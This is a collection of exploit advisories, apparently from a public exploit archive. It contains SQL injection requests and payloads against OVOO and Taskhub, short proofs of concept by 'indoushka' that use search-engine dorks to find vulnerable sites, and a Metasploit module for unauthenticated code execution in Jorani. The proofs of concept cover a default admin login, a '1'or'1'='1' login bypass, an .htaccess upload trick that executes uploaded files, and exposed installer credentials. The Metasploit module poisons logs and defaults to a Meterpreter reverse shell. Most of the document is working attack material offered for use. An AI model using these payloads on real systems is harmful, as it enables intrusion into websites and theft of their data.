<pre><code># Exploit Title: OVOO Movie Portal CMS v3.3.3 - SQL Injection<br /># Date: 2023-08-12<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor: https://codecanyon.net/item/ovoomovie-video-streaming-cms-with-unlimited-tvseries/20180569<br /># Tested on: Kali Linux & MacOS<br /># CVE: N/A<br /><br />### Request ###<br />POST /filter_movies/1 HTTP/2<br />Host: localhost<br />Cookie: ci_session=tiic5hcli8v3qkg1chgj0dqpou9495us<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)<br />Gecko/20100101 Firefox/116.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Referer: http://localhost/movies.html<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 60<br />Origin: htts://localhost<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />action=fetch_data&minimum_rating=1&maximum_rating=6.8&page=1<br /><br />### Parameter & Payloads ###<br />Parameter: maximum_rating (POST)<br />Type: boolean-based blind<br />Title: AND boolean-based blind - WHERE or HAVING clause<br />Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND<br />2238=2238&page=1<br />Type: time-based blind<br />Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br />Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND (SELECT<br />4101 FROM (SELECT(SLEEP(5)))FLwc)&page=1<br /><br /></code></pre>
<pre><code># Exploit Title: Taskhub CRM Tool 2.8.6 - SQL Injection<br /># Date: 2023-08-12<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor:<br />https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874<br /># Tested on: Kali Linux & MacOS<br /># CVE: N/A<br /><br />### Request ###<br />GET /projects?filter=notstarted HTTP/1.1<br />Host: localhost<br />Cookie: csrf_cookie_name=a3e6a7d379a3e5f160d72c182ff8a8c8;<br />ci_session=tgu03eoatvsonh7v986g1vj57b8sufh9<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)<br />Gecko/20100101 Firefox/116.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: none<br />Sec-Fetch-User: ?1<br />Te: trailers<br />Connection: close<br />### Parameter & Payloads ###<br />Parameter: filter (GET)<br />Type: boolean-based blind<br />Title: AND boolean-based blind - WHERE or HAVING clause<br />Payload: filter=notstarted' AND 2978=2978 AND 'vMQO'='vMQO<br />Type: error-based<br />Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY<br />clause (EXTRACTVALUE)<br />Payload: filter=notstarted' AND<br />EXTRACTVALUE(5313,CONCAT(0x5c,0x716a707a71,(SELECT<br />(ELT(5313=5313,1))),0x71787a6b71)) AND 'ronQ'='ronQ<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : FlightPath LMS v4.8.2 Insecure Direct Object Reference Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) |<br />| # Vendor : http://getflightpath.com | <br />| # Dork : R.I.P |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] suffers from an insecure direct object reference vulnerability that allows an unauthorized administrative access.<br /><br />[+] Use payload : /tools/course-search/<br /><br />[+] http://127.0.0.1/getflightpathcom/sites/getflightpath/demo/4x/flightpath/tools/course-search<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : FleetCart - Laravel Ecommerce System v1.1.2 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | <br />| # Vendor : https://codecanyon.net/item/fleetcart-laravel-ecommerce-system/23014826?s_rank=175 | <br />| # Dork : R.I.P |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] appears to leave a default administrative account in place post installation.<br /><br />[+] Use Payload : Email: admin@email.com & Password: 123456 <br /><br />[+] Panel : https://127.0.0.1/kingamesro/admin/media<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : FixBook - Repair Shop Management Tool v2.2 Password Hash Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://codecanyon.net/item/fixbook-repair-shop-management-tool/12333567 |<br />| # Dork : R.I.P |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] Open the source code of the page.<br /><br />[+] Go 2 line 49 found pass of databass encrypted . view-source:http://target_site/repair/update/<br /><br />[+] Here Update admin information : http://127.0.0.1/epbuys.co.uk/repair/update/<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : DoorGets CMS v12 Sensitive information disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | <br />| # Vendor : https://sourceforge.net/ | <br />| # Dork : "Powered with doorGets ™" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Payload gives you the username and password for the site script manager.<br /><br />[+] The problem is caused when the installation folder is not deleted by the user .<br /><br />[+] In this case the developer made a mistake .<br /><br /> So that after installation, the script does not delete the installation file or notify the user of changing the folder path or deleting it. <br /><br /> It also stores the manager's information in temporary files that any visitor can scan and can use this information to the script control panel.<br /><br />[+] Use Payload : setup/temp/admin.php<br /><br />[+] it show you login information for admin access .<br /><br />[+] http://127.0.0.1/watsingschoolacth/v12/setup/temp/admin.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : FIRESHOP Advanced CMS v2.3 unrestricted file upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://p30vel.ir |<br />| # Dork : R.I.P |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] Unauthorized access. Allows any user to upload malicious files and run them<br /><br />[+] after login go to http://127.0.0.1/frtu/upload.php<br /><br />[+] use payload : <br /><br /> <FilesMatch "^.*\.mp3"><br /> SetHandler application/x-httpd-php<br /> </FilesMatch><br /> <br />[+] 1- save code as .htaccess and upload it<br /><br />[+] 2- Upload the malicious file in the form of extension (.mp3) 3v!l.mp3<br /><br />[+] go to http://127.0.0.1/frtu/img/upload/up.mp3<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : FastMatch İddaa Tahmin Scripti v2.0 auth by pass vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 73.0.1(32-bit) | <br />| # Vendor : http://wmscripti.com/php-scriptler/fastmatch-iddaa-tahmin-scripti.html | <br />| # Dork : "FastMatch | İddaa Tahminleri Beta" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] infected file : login.php<br /><br />[+] line 9 : $bul = mysql_query("select * from admin where kadi='$user' && sifre='$pass'");<br /><br />[+] use Payload : user & pass : 1'or'1'='1 <br /><br />[+] Panel : http://127.0.0.1/zkulubucom/admin/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>==================================================================================================================================<br />| # Title : E-mailer Newsletter & Mailing System with Analytics + GEO location v1.16 information Disclosure vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : https://codecanyon.net/item/emailer-newsletter-mailing-system-with-analytics-geo-location/15345207 | <br />==================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] use default pass and user : demo <br /><br />[+] after login add install.php<br /><br />[+] http://127.0.0.1/software.pklopotowskipl/demo/e-mailer/install.php <br /><br />[+] they show you system configuration database.<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Jorani unauthenticated Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated Remote Code Execution in Jorani prior to 1.0.2.<br /> It abuses 3 vulnerabilities: log poisoning and redirection bypass via header spoofing, then it uses path traversal to trigger the vulnerability.<br /> It has been tested on Jorani 1.0.0.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'RIOUX Guilhem (jrjgjk)'<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-26469'],<br /> ['URL', 'https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py']<br /> ],<br /> 'Platform' => %w[php],<br /> 'Arch' => ARCH_PHP,<br /> 'Targets' => [<br /> ['Jorani < 1.0.2', {}]<br /> ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'php/meterpreter/reverse_tcp',<br /> 'RPORT' => 443,<br /> 'SSL' => true<br /> },<br /> 'DisclosureDate' => '2023-01-06',<br /> 'Privileged' => false,<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [true, 'The base path of Jorani', '/'])<br /> ]<br /> )<br /> end<br /><br /> def get_version(res)<br /> footer_text = res.get_html_document.xpath('//div[contains(@id, "footer")]').text<br /> matches = footer_text.scan(/v([0-9.]+)/i)<br /> if matches.nil? || matches[0].nil?<br /> print_error('Cannot recovered Jorani version...')<br /> return nil<br /> end<br /> matches[0][0]<br /> end<br /><br /> def service_running(res)<br /> matches = res.get_html_document.xpath('//head/meta[@description]/@description').text.downcase.scan(/leave management system/)<br /> if matches.nil?<br /> print_error("Jorani doesn't appear to be running on the target")<br /> return false<br /> end<br /> true<br /> end<br /><br /> def recover_csrf(res)<br /> csrf_token = res.get_html_document.xpath('//input[@name="csrf_test_jorani"]/@value').text<br /> return csrf_token if csrf_token.length == 32<br /><br /> nil<br /> end<br /><br /> def check<br /> # For the check command<br /> print_status('Checking Jorani version')<br /> uri = normalize_uri(target_uri.path, 'index.php')<br /><br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => "#{uri}/session/login"<br /> )<br /><br /> if res.nil?<br /> return Exploit::CheckCode::Safe('There was a problem accessing the login page')<br /> end<br /><br /> return Exploit::CheckCode::Safe unless service_running(res)<br /><br /> print_good('Jorani seems to be running on the target!')<br /><br /> current_version = get_version(res)<br /> return Exploit::CheckCode::Detected if current_version.nil?<br /><br /> print_good("Found version: #{current_version}")<br /> current_version = Rex::Version.new(current_version)<br /><br /> return Exploit::CheckCode::Appears if current_version < Rex::Version.new('1.0.2')<br /><br /> Exploit::CheckCode::Safe<br /> end<br /><br /> def exploit<br /> # Main function<br /> print_status('Trying to exploit LFI')<br /><br /> path_trav_payload = '../../application/logs'<br /> header_name = Rex::Text.rand_text_alpha_upper(16)<br /> poison_payload = "<?php if(isset($_SERVER['HTTP_#{header_name}'])){ #{payload.encoded} } ?>"<br /> log_file_name = "log-#{Time.now.strftime('%Y-%m-%d')}"<br /><br /> uri = normalize_uri(target_uri.path, 'index.php')<br /><br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'keep_cookies' => true,<br /> 'uri' => "#{uri}/session/login"<br /> )<br /><br /> if res.nil?<br /> print_error('There was a problem accessing the login page')<br /> return<br /> end<br /><br /> print_status('Recovering CSRF token')<br /> csrf_tok = recover_csrf(res)<br /> if csrf_tok.nil?<br /> print_status('CSRF not found, doesn\'t mean its not vulnerable')<br /> else<br /> print_good("CSRF found: #{csrf_tok}")<br /> end<br /> print_status('Poisoning log with payload..')<br /> print_status('Sending 1st payload')<br /><br /> send_request_cgi(<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'uri' => "#{uri}/session/login",<br /> 'data' => "csrf_test_jorani=#{csrf_tok}&" \<br /> 'last_page=session/login&' \<br /> "language=#{path_trav_payload}&" \<br /> "login=#{Rex::Text.uri_encode(poison_payload)}&" \<br /> "CipheredValue=#{Rex::Text.rand_text_alpha(14)}"<br /> )<br /><br /> print_status("Including poisoned log file #{log_file_name}.php")<br /> vprint_warning('The date on the attacker and victim machine must be the same for the exploit to be successful due to the timestamp on the poisoned log file. Be careful running this exploit around midnight across timezones.')<br /> print_good('Triggering payload')<br /><br /> send_request_cgi(<br /> 'method' => 'GET',<br /> 'keep_cookies' => true,<br /> 'uri' => "#{uri}/pages/view/#{log_file_name}",<br /> 'headers' =><br /> {<br /> 'X-REQUESTED-WITH' => 'XMLHttpRequest',<br /> header_name => Rex::Text.rand_text_alpha(14)<br /> }<br /> )<br /><br /> nil<br /> end<br />end<br /></code></pre>